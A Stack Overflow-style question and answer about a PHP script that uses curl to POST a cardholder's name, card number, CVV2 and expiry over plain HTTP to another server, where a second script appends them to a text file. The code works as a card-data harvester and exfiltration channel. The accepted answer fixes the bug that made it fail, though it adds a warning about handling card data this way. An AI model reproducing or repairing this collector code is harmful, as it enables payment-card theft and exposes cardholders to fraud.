# Sending post data via curl using php

Tags: php, session, post, curl

I am having problem in this script. The problem i m facing is when i send a large amount of data in a variable like cc_no = 3654785698568 i get blank on text file where i m checking it. Others variables are working fine.

```
session_set_cookie_params(0);
session_start();


echo $cc_name = $_SESSION['card_name'];
echo $cc_no = $_SESSION['card_no'];
echo $cc_cvv2 = $_SESSION['cvv2'];
echo $cc_expiry = $_SESSION['expiry'];

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,"http://example.com/db/get.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
            "cc_name=$cc_name&cc_no=$cc_no&cc_cvv2=$cc_cvv2&cc_expiry=$cc_expiry");

// receive server response ...
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$server_output = curl_exec ($ch);

curl_close ($ch);
```

The code which is catching the values on other server.

```
<?php

$fp = fopen("formdata.txt", "a");
$cc_name1 = $_POST['cc_name'];
$cc_no1 = $_POST['card_no'];
$cc_cvv21 = $_POST['cc_cvv2'];
$cc_expiry1 = $_POST['cc_expiry'];

$data = "$cc_name1 | $cc_no1 | $cc_cvv21 | $cc_expiry1 \n";

fwrite($fp, $data);
fclose($fp);

?>
```

Comment: What is the field in database set to ?

Comment: How is the db column config?

Comment: Like first of all i tried to store the values in txt file to see if all the code was working but i get blanks when i enter cc_no. It has nothing to do with db atm

Comment: unless cc_no is a bigint, you're probably overflowing the 2^32 or 2^31 max size for a unsigned/signed int.

Comment: Post the code that *handles* the query, not the one that makes it.

Comment: No i am first trying to store these values in txt file to check if all values are passed successfully, i get all values but not cc_no, this is maybe due to some length problem or what

Comment: You are not checking for `curl_error()`. That would be the first step towards finding out what goes wrong.

Comment: Hm, newline char in `$cc_no`? Check the error like Pekka says, but I usually prefer to feed just an array of key => value pairs to `CURLOPT_POSTFIELDS` so it can create & escape the post string as it likes without me making errors..

Answer (score 2):

```
$cc_no1 = $_POST['card_no'];
```

should be:

```
$cc_no1 = $_POST['cc_no'];
```

Edit:

I *really* hope this is for learning only. CCs should not be handled this way, especially over  standard http.

Comment: Thanks alot! I can't believe i made such a silly mistake. Can i encode the values that are being sent via curl?

Comment: If you really want to handle credit cards you need to follow the rules/guidelines for doing so. Can't help you with specifics, but yes: encryption is necessary, so is transfer over a secure, trusted connection.